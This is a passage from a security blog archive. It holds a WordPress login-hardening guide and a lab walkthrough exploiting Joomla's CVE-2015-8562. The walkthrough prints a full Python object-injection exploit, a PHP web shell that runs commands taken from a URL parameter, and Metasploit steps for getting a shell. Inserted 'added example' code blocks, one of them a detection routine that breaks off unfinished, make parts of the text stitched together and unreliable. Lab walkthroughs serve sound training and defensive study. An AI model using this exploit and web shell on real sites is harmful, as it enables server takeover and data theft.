exploited from any client application; only the tools and techniques can
greatly differ.<br />
<h1>
References</h1>
[1] The top cloud computing threats and vulnerabilities in an enterprise environment: <a href="http://www.cloudcomputing-news.net/news/2014/nov/21/top-cloud-computing-threats-and-vulnerabilities-enterprise-environment/">http://www.cloudcomputing-news.net/news/2014/nov/21/top-cloud-computing-threats-and-vulnerabilities-enterprise-environment/</a><br />
[2] Top 10 2013-Top 10: <a href="https://www.owasp.org/index.php/Top_10_2013-Top_10">https://www.owasp.org/index.php/Top_10_2013-Top_10</a></div>
Posted by Anonymous (http://www.blogger.com/profile/14161834164641471363).<br />
<h1>
Securing Your WordPress Admin Panel</h1>
Published 2015-12-31T13:58:00.000+05:30, updated 2015-12-31T13:58:41.594+05:30.<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Today, anyone can create their own website with tools such as
WordPress, Joomla or Drupal. However, many people suffer when they do
not take precautions to secure those installations. If you look at the
jobs in a freelancing website, it is likely that you will see job offers
of people telling that their WordPress website was hacked and
requesting help to solve the issue.<br />
Below, we will examine how you can secure your WordPress Admin Panel
and its associated Login Page. We will start by discussing usernames and
passwords and move on to enabling account lockouts, serving the login page
over SSL, adding a CAPTCHA to the login page, whitelisting the IPs that
are allowed to use the login page, hiding the login page and adding
extra layers of protection such as having to enter two different usernames and
passwords to log in to your WordPress website successfully.<br />
<h1>
Choose your usernames and passwords wisely, especially for the administrative account</h1>
If you are about to install WordPress, do not allow the default
administrative account to be called admin. This is the first username
all attackers try to exploit via brute-forcing, dictionary, or other
attacks.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou1.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 1: Setting up an administrative account in WordPress<br />
</em></span></div>
Even if you pick something only slightly different such as <strong>iamadmin</strong>, it can save you a lot of trouble. When picking a password, be sure that WordPress deems it <strong>strong.</strong> Observe the bar below the password and ensure it is green in color.<br />
You have to be aware that even if an attacker cannot gain financial
advantage from gaining administrative privileges in your website it does
not mean that he will not try to gain such privileges.<br />
Look at the figure below:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou2.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 2 A brute-force or dictionary attack against a WordPress site<br />
</em></span></div>
In the figure above, you can see an attack against the WordPress
admin panel. All lockouts occurred on the same day and all targeted
a possibly weak <strong>admin</strong> username. Dictionaries do not
contain so many words that the trial-and-error process would take
long. So, if you are using the default <strong>admin</strong> user and have a guessable password, it is highly likely that you will be hacked at some point.<br />
<strong>This is so because WordPress does not ban attackers if they
attempt to log in unsuccessfully too many times which gives attackers
infinite time to try to log in as administrators.<br />
</strong><br />
This brings us to the next point.<br />
<h1>
Limit the number of login attempts that can be made from an IP for a specified period</h1>
If you do not limit the number of login attempts and lock out the IP
for a certain time period, attacker scripts can run forever until they
find the username and password they are looking for.<br />
A plugin that I like to use is <a href="https://wordpress.org/plugins/limit-login-attempts/">Limit Login Attempts</a>. It has not been updated in 4 years but it works with the latest WordPress version and it still does the job.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou3.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 3: Customizing the Limit Login Attempts plugin<br />
</em></span></div>
You can choose to log the IP addresses that failed to log in too many
times, so you can investigate the attacks and possibly permanently
prohibit access from those addresses. You can set the plugin to send you
an email after an IP address reaches a number of lockouts you specify,
and you can customize many other details of the lockout process.<br />
I have disabled JavaScript and cookies to try out the plugin in the
way that automated cracking tools access web content and the plugin
works as expected.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou4.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 4: 1 login attempt remains until lockout<br />
</em></span></div>
After the lockout, even if I type the correct credentials I will not
be able to log in which leaves attackers in the dark as they will not be
able to know if the username/password combination they are trying is
valid or invalid.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou5.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 5:Lockout prevents us to log in even with the right credentials<br />
</em></span></div>
<h1>
Force SSL login to prevent Man-in-the-Middle Attacks</h1>
Whether or not you have multiple users writing or editing your
WordPress website, there are times when you need to log in to WordPress
from a public computer, a public Wi-Fi or another untrusted network.
Doing this makes you vulnerable to Man-in-the-Middle attacks. Basically,
attackers can listen to the traffic in that network, capture the
HTTP request to the WordPress admin panel in which you are trying to log in,
and see the credentials you are using in plaintext. To prevent this,
you can use SSL when authenticating yourself or your other users in
WordPress. To do this, your page has to be accessible over <strong>https. </strong> You can test whether that is the case by prepending https to your page, like <em>https://example.com</em>. If you get an error, then you have to buy an SSL certificate and set up your web server appropriately.<br />
But if your website is already accessible over https, you can open your <strong><em>wp-config.php</em></strong>
file (it is located in the root directory of your WordPress website),
edit it with your favorite editor and add the following lines to the
file:<br />
<span style="font-family: Courier New;">// use ssl (https) for the login page<br />
define(‘FORCE_SSL_LOGIN’, true);<br />
//use ssl (https) for the whole admin area<br />
define(‘FORCE_SSL_ADMIN’, true);<br />
</span><br />
The <strong>FORCE_SSL_LOGIN</strong> constant would redirect and allow only <em>https</em> to be used when attempting to log in. The <strong><em>FORCE_SSL_ADMIN </em></strong>constant would enforce secure connection throughout the entire admin panel/area.<br />
If you enable one of those, you would always be redirected to <strong>https</strong> when attempting to log in which will limit the possibilities of someone sniffing your traffic.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou6.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 6: If you do not have a SSL certificate or the server is not configured properly you will get a similar error message<br />
</em></span></div>
<h1>
Implement a CAPTCHA in the login page</h1>
Implementing a CAPTCHA in the login page can minimize hacking
attempts by prohibiting automated scripts from trying to brute-force or
performing other attacks on your login page without first being able to
solve the problem posed by the CAPTCHA. If you simply open the WordPress
admin panel and click on <strong><em>Plugins -> Add New</em></strong>, then type <em>captcha</em> you will be presented with many plugins to choose from.<br />
Let us look at one of the possible plugins. <a href="https://wordpress.org/plugins/captcha/">Captcha by BestWebSoft</a>
has been installed more than 300,000 times and has a good rating (4.5/5).
When installed, it creates a new item in your admin menu where you can
customize it. It is possible to use it for your login page and your password
reset page, and of course it may prove useful for comments and user
registrations, if they are enabled. You can whitelist IPs which would
not have to solve the CAPTCHA, and you can customize the messages related
to the CAPTCHA, such as the message shown when a user fills in the
captcha field incorrectly. You can also specify whether you want the
CAPTCHA to include both words and numbers or only one of those.<br />
If you simply activate it after the installation, you would have a
login form with a CAPTCHA. If the person does not fill the CAPTCHA
properly he cannot know if a username/password combination is valid or
invalid.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou7.png" /></div>
Figure 7: A CAPTCHA on the WP Login Page<br />
<h1>
Allow only specific IPs to log in</h1>
If you have a static IP and know that your IP would not change
frequently, you can show the login page only if the user's IP is a
whitelisted value, using the <strong>.htaccess</strong> file in your <strong>wp-admin</strong> folder. Even if your IP changes, you would still be able to log in by modifying the <strong>.htaccess</strong>
file to reflect the new IP address. You can allow numerous IP addresses
if you want to be able to log in from different networks and computers
or if you have other persons logging into WordPress.<br />
To do this, you would have to open an FTP connection to the server (or
access the files in any other way that suits you) and access the files
of your WordPress website. Then you open the <strong>wp-admin</strong> folder and create or edit a file inside it which has to be called <strong>.htaccess</strong> (no file name, just an extension) and add the following:<br />
<span style="font-family: Courier New;">order deny,allow<br />
# Replace 99.99.99.99 with the desired IP address<br />
allow from 99.99.99.99<br />
#allow more IP addresses to access the wp-admin area by uncommenting the line below and editing the IP address<br />
#allow from 98.98.98.98<br />
deny from all<br />
</span><br />
After the <strong>allow from</strong> keywords, you add the
IP address which is allowed to log in to WordPress. If you
want multiple IP addresses, you just copy the allow from <strong>99.99.99.99</strong> line and edit the IP address value.<br />
After you have set up the .htaccess file, users whose IP address is not
whitelisted will be able neither to open the login page nor to use the
admin panel.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou8.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 8: I do not have an allowed IP address and cannot administrate or view the login page<br />
</em></span></div>
<h1>
Obfuscate your admin area</h1>
If you really feel like the above is not enough, you can try to
obfuscate your admin area. You can rename the URL of the login
page to something other than the default.
With the defaults, you can access the login page with <strong>example.com/admin</strong>, <strong>example.com/wp-admin </strong>or <strong>example.com/wp-login.php</strong>. To do this, you can use several plugins. We have chosen to show one of those plugins called <a href="https://wordpress.org/plugins/wps-hide-login/">WPS Hide Login</a><strong>. </strong>Once activated, it creates additional settings in the <strong>Settings -> General </strong>admin
menu in which you can select a URL that will be used for logging in.
Users attempting to log in with the traditional URLs will be redirected
to the homepage.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou9.png" /></div>
<span style="color: #44546a; font-size: 9pt;"><em>Figure 9: Setting up a new login page with the WPS Hide Login plugin.</em></span>Although attackers can still brute-force, guess or social engineer
the URL to your admin page it can be a bit discouraging trying to figure
out where it is and it will take an extra effort that many may not find
worth it.<br />
<h1>
Adding extra layers of protection to the Login page or enabling Two-Factor Authentication</h1>
To make the login page more secure, you can choose to add an extra
layer of protection to it, such as requiring users to first provide
credentials using HTTP Basic Auth in order to view the login page itself
and log in as a user. If you choose <strong>Two-Factor Authentication</strong> there are many plugins to choose from which will do the job.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou10.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 10: Some of the plugins allowing 2FA in WP<br />
</em></span></div>
If you are not into that and do not feel that your website is so
important as to require 2FA, you can just add another layer of protection to
your website. The simplest way would be to edit the <strong>wp-login.php</strong> file located in your website’s root and add the following at the top of the file:<br />
<span style="font-family: Courier New;">/** HTTP Basic Auth **/<br />
if (!isset($_SERVER[‘PHP_AUTH_USER’])) {<br />
header(‘WWW-Authenticate: Basic realm=”WordPress”‘);<br />
header(‘HTTP/1.0 401 Unauthorized’);<br />
echo ‘You need proper credentials to view this page’;<br />
exit;<br />
} else {<br />
$users = array(‘iamadmin’ => ‘iamtheadmin’, ‘johny’ => ‘bravo’);<br />
if (!array_key_exists($_SERVER[“PHP_AUTH_USER”], $users) || $users[$_SERVER[“PHP_AUTH_USER”]] !== $_SERVER[‘PHP_AUTH_PW’]) {<br />
echo “Wrong credentials!”;<br />
exit;<br />
}</span><br />
}<br />
The code snippet above hardcodes some usernames and passwords which
can be used to see the login page and reveals the login page only if the
user has entered one of the two (you can edit them) user/password
combinations in the <em>$users</em> array. The snippet shows the HTTP
Basic Auth credentials box only once per user session (if the user types
the wrong username/password combination he would have to close his
browser and open it again) but this could easily be changed by adding
the two lines mentioned below in the <strong><em>else</em></strong> conditional:<br />
<span style="font-family: Courier New;">header(‘WWW-Authenticate: Basic realm=”WordPress”‘);<br />
header(‘HTTP/1.0 401 Unauthorized’);<br />
</span><br />
The problem with inserting the above snippet in <strong>wp-login.php</strong>
is that your changes may get lost when you install an update.
Therefore, it would be best to create your own login page and use
WordPress’ global <em>wp_login_form()</em> function to show the login
form in it. There, you can add HTTP Basic Auth at your leisure. Another
way to implement HTTP Basic Auth (without hardcoding credentials in the
code), by editing the <strong>.htaccess</strong> file and adding a <strong>.pwd</strong> file with the allowed user credentials on your web server, can be seen here: <a href="http://www.helpdeskhangouts.com/securing-wordpress-admin-basic-http-authentication/">http://www.helpdeskhangouts.com/securing-wordpress-admin-basic-http-authentication/</a><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou11.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 11: We will be shown the WP Login Page only after we provide correct credentials to HTTP Basic Auth<br />
</em></span></div>
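The lost-on-update problem and the plaintext passwords in the snippet above can both be avoided by putting the same gate in a must-use plugin. The following is an added example, not the article's code: it assumes WordPress's <em>login_init</em> hook and the <em>wp-content/mu-plugins</em> directory, and the two user entries are constructed placeholders.

```php
<?php
/**
 * Added example (not from the original article): the HTTP Basic Auth gate in
 * front of the WordPress login page, written as a must-use plugin so that core
 * updates cannot overwrite it. Save as wp-content/mu-plugins/login-gate.php.
 *
 * Compared with the wp-login.php snippet in the article it
 *   - stores password_hash() output instead of plaintext passwords,
 *   - compares in constant time and checks every entry (no username oracle),
 *   - re-sends the challenge on every failure, so the browser prompts again.
 *
 * Caveat: under CGI/FastCGI the web server may not pass the Authorization
 * header into PHP_AUTH_USER/PHP_AUTH_PW without extra configuration.
 */

/**
 * Username => password hash. Generate each hash once, for example with
 *   php -r 'echo password_hash("iamtheadmin", PASSWORD_DEFAULT), PHP_EOL;'
 * and paste the result here. The two values below are constructed placeholders
 * and will not verify until replaced.
 */
const LOGIN_GATE_USERS = [
    'iamadmin' => '$2y$10$REPLACE_WITH_HASH_FOR_iamadmin',
    'johny'    => '$2y$10$REPLACE_WITH_HASH_FOR_johny',
];

/** True only if $user/$pass match one entry. Every entry is checked so the
 *  response time does not reveal which usernames exist. */
function login_gate_check(array $users, ?string $user, ?string $pass): bool
{
    if ($user === null || $pass === null) {
        return false;
    }
    $ok = false;
    foreach ($users as $name => $hash) {
        $nameMatches = hash_equals((string) $name, $user);
        $passMatches = password_verify($pass, $hash);
        if ($nameMatches && $passMatches) {
            $ok = true;
        }
    }
    return $ok;
}

/** Send the Basic Auth challenge and stop. Sending the 401 on every failed
 *  attempt is what makes the browser show the credentials box again. */
function login_gate_challenge(): void
{
    header('WWW-Authenticate: Basic realm="WordPress"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'You need proper credentials to view this page';
    exit;
}

if (function_exists('add_action')) {
    // Loaded by WordPress: login_init fires at the top of wp-login.php.
    add_action('login_init', function (): void {
        $user = $_SERVER['PHP_AUTH_USER'] ?? null;
        $pass = $_SERVER['PHP_AUTH_PW'] ?? null;
        if (!login_gate_check(LOGIN_GATE_USERS, $user, $pass)) {
            login_gate_challenge();
        }
    });
} elseif (PHP_SAPI === 'cli') {
    // Stand-alone self-check with constructed credentials hashed on the fly.
    $demo = ['iamadmin' => password_hash('iamtheadmin', PASSWORD_DEFAULT)];
    $pass = login_gate_check($demo, 'iamadmin', 'iamtheadmin')
        && !login_gate_check($demo, 'iamadmin', 'bravo')
        && !login_gate_check($demo, 'johny', 'iamtheadmin')
        && !login_gate_check($demo, null, null);
    echo $pass ? "self-check passed\n" : "self-check FAILED\n";
}
```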
<h1>
Conclusion</h1>
As WordPress is so easy to use, many people forget that extra layers
of protection are required in order for their WordPress installation to
live a long and fruitful life. Attacks against the admin section of
WordPress are very common and unless precautions are taken, you may
become a victim too. There are many ways to protect the login page and
you should use several of them to increase the resilience of your
WordPress installation.</div>
2015-12-31: Exploiting JOOMLA RCE CVE-2015-8562<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
Introduction:</h1>
A critical remote code execution (RCE) vulnerability was discovered in
Joomla! websites. This is making a lot of noise for the
following reasons.<br />
<ol>
<li>It appears that attackers started exploiting this even before the disclosure (0-day).</li>
<li>It is very easy to exploit this vulnerability.</li>
<li>Almost all versions of Joomla are vulnerable under certain conditions.</li>
</ol>
<h2>
What is this vulnerability?</h2>
At its core, this is an input validation issue. An attacker can
inject arbitrary input using the X-FORWARDED-FOR or User-Agent header to
achieve code execution. Detailed analysis has already been covered <a href="https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html">here</a>, so let’s not re-invent the wheel.<br />
<h2>
Who is vulnerable?</h2>
All versions of Joomla! below 3.4.6 are known to be vulnerable.
Exploitation, however, is only possible with PHP versions below 5.5.29,
below 5.6.13, or any version below 5.5.<br />
<h1>
Lab Setup:</h1>
I have created a VM for the readers to get hands on experience while reading this article. It can be downloaded from this <a href="https://www.dropbox.com/s/2ndalmtr2i4788j/Joomla_VM.ova?oref=e&n=85817648">link</a>. So, if you want to get the taste of exploiting this vulnerability, download this VM before you proceed further.<br />
Login credentials for the VM are as shown below.<br />
Username: joomla<br />
Password: joomla<br />
The application is hosted at http://<ip address>/joomla/<br />
Kali Linux is the attacker’s machine.<br />
<h1>
Information Gathering:</h1>
Let’s gather some information about the target as we do in a typical black box pentest.<br />
The default Joomla! Installations come with an administrator control panel at /<b>administrator</b>/ path.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC1.png" /><span style="background-color: #fdfdfd;"><br />
</span></div>
This confirms that the target is running Joomla!. We can also find
Joomla! installations using other ways but I am leaving them to you.<br />
<h1>
Finding out the Joomla version:</h1>
One of the common ways to find Joomla! version is to check “/language/en-GB/en-GB.xml” file.<br />
Let’s do it.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC2.png" /><span style="background-color: #fdfdfd; font-family: Arial; font-size: 11pt;"><br />
</span></div>
The above figure shows the target version as 3.4.3<br />
Metasploit has got a scanner to find this. We can use that as well.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC3.png" /><span style="background-color: #fdfdfd; font-family: Arial; font-size: 11pt;"><br />
</span></div>
The above figure shows the Metasploit’s Joomla! version scanner.<br />
<h1>
PHP Version:</h1>
Another important thing we need to remember here is the PHP version.
As mentioned earlier, exploitation is only possible with PHP versions below
5.5.29, below 5.6.13, or any version below 5.5.<br />
We can use <b>curl</b> to find the PHP version. Run the following command and observe the response headers.<br />
<span style="font-family: Courier New;">curl –v –X HEAD http://<ipaddress>/joomla/<br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC4.png" /></div>
The above figure shows the PHP version installed on the target box.
Well, we are on our way to exploit this box as the PHP version is
matching our requirement.<br />
<h1>
Exploitation:</h1>
As mentioned in the beginning, this vulnerability was being exploited
before its public disclosure. The following is one of the first public
exploits available online for this vulnerability.<br />
Download links:<br />
<a href="http://pastebin.com/PRiK0SWL">http://pastebin.com/PRiK0SWL</a><br />
(or)<br />
<a href="https://www.exploit-db.com/exploits/38977/">https://www.exploit-db.com/exploits/38977/</a><br />
<span style="font-family: Courier New;">”’<br />
</span><br />
<span style="font-family: Courier New;"> Simple PoC for Joomla Object Injection.<br />
</span><br />
<span style="font-family: Courier New;"> Gary @ Sec-1 ltd<br />
</span><br />
<span style="font-family: Courier New;"> http://www.sec-1.com/<br />
</span><br />
<span style="font-family: Courier New;">”’<br />
</span><br />
<span style="font-family: Courier New;">import requests # easy_install requests<br />
</span><br />
<span style="font-family: Courier New;">def get_url(url, user_agent):<br />
</span><br />
<span style="font-family: Courier New;"> headers = {<br />
</span><br />
<span style="font-family: Courier New;"> ‘User-Agent’: user_agent<br />
</span><br />
<span style="font-family: Courier New;"> }<br />
</span><br />
<span style="font-family: Courier New;"> cookies = requests.get(url,headers=headers).cookies<br />
</span><br />
<span style="font-family: Courier New;"> for _ in range(3):<br />
</span><br />
<span style="font-family: Courier New;"> response = requests.get(url, headers=headers,cookies=cookies)<br />
</span><br />
<span style="font-family: Courier New;"> return response<br />
</span><br />
<span style="font-family: Courier New;">def php_str_noquotes(data):<br />
</span><br />
<span style="font-family: Courier New;"> “Convert string to chr(xx).chr(xx) for use in php”<br />
</span><br />
<span style="font-family: Courier New;"> encoded = “”<br />
</span><br />
<span style="font-family: Courier New;"> for char in data:<br />
</span><br />
<span style="font-family: Courier New;"> encoded += “chr({0}).”.format(ord(char))<br />
</span><br />
<span style="font-family: Courier New;"> return encoded[:-1]<br />
</span><br />
<span style="font-family: Courier New;">def generate_payload(php_payload):<br />
</span><br />
<span style="font-family: Courier New;"> php_payload = “eval({0})”.format(php_str_noquotes(php_payload))<br />
</span><br />
<span style="font-family: Courier New;"> terminate = ‘\xf0\xfd\xfd\xfd’;<br />
</span><br />
<span style="font-family: Courier New;"> exploit_template =
r”’}__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;”’<br />
</span><br />
<span style="font-family: Courier New;"> injected_payload = “{};JFactory::getConfig();exit”.format(php_payload)<br />
</span><br />
<span style="font-family: Courier New;"> exploit_template += r”’s:{0}:”{1}””’.format(str(len(injected_payload)), injected_payload)<br />
</span><br />
<span style="font-family: Courier New;"> exploit_template +=
r”’;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\0\0\0connection”;b:1;}”’
+ terminate<br />
</span><br />
<span style="font-family: Courier New;"> return exploit_template<br />
</span><br />
<span style="font-family: Courier New;">pl = generate_payload(“system(‘touch /tmp/fx’);”)<br />
</span><br />
<span style="font-family: Courier New;">print get_url(“http://172.31.6.242/”, pl)<br />
</span><br />
It’s a POC exploit which creates a file inside “/tmp” folder of the target server.<br />
To test this exploit, just modify the last line with your target application’s path.<br />
If you are using the VM provided, it should be “http://<IP Address>/joomla/”<br />
In my case, it is<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC5.png" /><span style="font-family: Courier New;"><br />
</span></div>
We are ready to test the exploit. Just run it using the following command from your Kali Linux.<br />
<span style="font-family: Courier New;">python joomla_poc.py<br />
</span><br />
This should create a new file with the name “fx” on the target system within “/tmp” folder. This is shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC6.png" /></div>
Now, let’s make some minor modifications to this exploit to upload a
shell on to the target server. Before we upload a shell, let’s see if
the target webserver path is writable. So, modify the exploit as shown
below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC7.png" /></div>
The above image shows how we can add a file named “shell.php” with the following code.<br />
<span style="font-family: Courier New;"><?php<br />
</span><br />
<span style="font-family: Courier New;">phpinfo();<br />
</span><br />
<span style="font-family: Courier New;">?><br />
</span><br />
Now, access the file “shell.php” to see if it is created.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC8.png" /></div>
It worked. So, we can also add any other file.<br />
Let’s add another file to get a shell on the server. Modify the exploit as shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC9.png" /><span style="background-color: #fdfdfd;"><br />
</span></div>
This adds the file <b>“shell.php”</b> with following code to the server.<br />
<span style="font-family: Courier New;"><?php<br />
</span><br />
<span style="font-family: Courier New;">$cmd=$_GET[‘cmd’];<br />
</span><br />
<span style="font-family: Courier New;">echo system($cmd);<br />
</span><br />
<span style="font-family: Courier New;">?><br />
</span><br />
Let’s use our shell now.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC10.png" /></div>
As we can see in the above figure, we are able to run shell commands.<br />
<b>Note</b>: For demonstration purposes, I am directly
using the webserver path but it may not be possible in all the cases if
the target directory is not writable (The VM used is the default
installation and I didn’t add any explicit write permissions). But, it
is not hard to circumvent this as we can get an interactive shell using
many other ways. You may check this <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">link</a> for more details on this.<br />
While you are running the exploit on your attacking machine, fire up
your wireshark and capture the packets on your working interface (in my
case, eth1 – HostOnly Adapter) to see what’s happening when you run this
exploit.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC11.png" /></div>
Opening up the “follow tcp stream” of our first http packet in the
above traffic capture, we can see the payload being sent using
“User-Agent” header.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC12.png" /></div>
<h1>
Exploitation with Metasploit:</h1>
As usual, Metasploit has released an exploit for this and made our
lives easier. The following figure shows the “Metasploit way” of
exploiting this target.<br />
First, you need to add this exploit to your Metasploit framework in order to follow the steps.<br />
If you don’t know how to add it, here’s how.<br />
<ol>
<li>Download the exploit into your kali machine from this <a href="https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb">link</a>.</li>
<li>Add it to <b>“/usr/share/metasploit-framework/modules/exploits/multi/http/</b>“</li>
<li>Open up your Metasploit console and type “<b>reload_all</b>“.</li>
</ol>
After adding the exploit, it is pretty straight forward to use it in Metasploit.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC13.png" /></div>
<div style="text-align: left;">
Once you set all the required options, you should see a meterpreter shell popping up as shown below.</div>
<div style="text-align: center;">
<img alt="" class="aligncenter" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC14.png" /></div>
Once again, Metasploit does the same as what we have seen with
Wireshark. This time, let’s go and check our database entries before and
after exploitation.<br />
Note: I deleted all the content from the “joomla_session” table
before running metasploit so we can see how it is exploiting the target.<br />
In the VM provided, following are the MySQL credentials.<br />
Username: root<br />
Password: toor<br />
“joomla_session” is the table which holds the session data. “data” is the column to be precise.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC15.png" /></div>
The above figure shows the column names of the “joomla_session” table. “data” is what we are interested in.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC16.png" /></div>
The above figure shows session data before running the exploit. Notice that the User-Agent information is saved in the database.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC17.png" /></div>
The above figure shows the session data after running the exploit. If
you closely observe the entries, there are signs that the payload has
been inserted.<br />
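From the defender's side, the same User-Agent values that land in the session table can be watched for that shape. The following is an added detection example, not part of the article or of the PoC it reproduces: the indicator heuristics are mine (they are not the Joomla! 3.4.6 patch) and the request records are constructed samples.

```php
<?php
/**
 * Added detection example (not part of the original article or of the PoC):
 * flag HTTP requests whose User-Agent or X-Forwarded-For header carries a
 * serialized PHP object, the shape CVE-2015-8562 payloads take on their way
 * into the joomla_session.data column. The heuristics below are mine, not the
 * Joomla! 3.4.6 patch, and the request records are constructed samples. The
 * same check can be run over the stored session rows shown in the article.
 */

/** Reasons a header value looks like an object-injection attempt; [] if none. */
function cve_2015_8562_indicators(string $header): array
{
    $reasons = [];

    // A serialized PHP object: O:<len>:"<Class>":<fields>:{
    if (preg_match('/O:\d+:"[A-Za-z0-9_\\\\]+":\d+:\{/', $header)) {
        $reasons[] = 'serialized PHP object';
    }
    // The PoC opens with }__<key>|O: to close the real session record early
    // and start a new serialized key that holds the injected object.
    if (preg_match('/\}__\w*\|O:/', $header)) {
        $reasons[] = 'session key injection (}__key|O:)';
    }
    // Gadget classes and callbacks used by the public PoC and the Metasploit module.
    foreach (['JDatabaseDriverMysqli', 'JSimplepieFactory', 'SimplePie',
              'disconnectHandlers', 'cache_name_function'] as $marker) {
        if (strpos($header, $marker) !== false) {
            $reasons[] = "gadget marker $marker";
            break;
        }
    }
    // Bytes outside printable ASCII; the PoC terminates its payload with \xf0\xfd\xfd\xfd.
    if (preg_match('/[^\x20-\x7E]/', $header)) {
        $reasons[] = 'non-printable or non-ASCII byte';
    }
    return $reasons;
}

/**
 * Scan request records (ip, ua, optional xff) and return one hit per suspicious
 * header: ['ip' => ..., 'header' => 'User-Agent'|'X-Forwarded-For', 'reasons' => [...]].
 */
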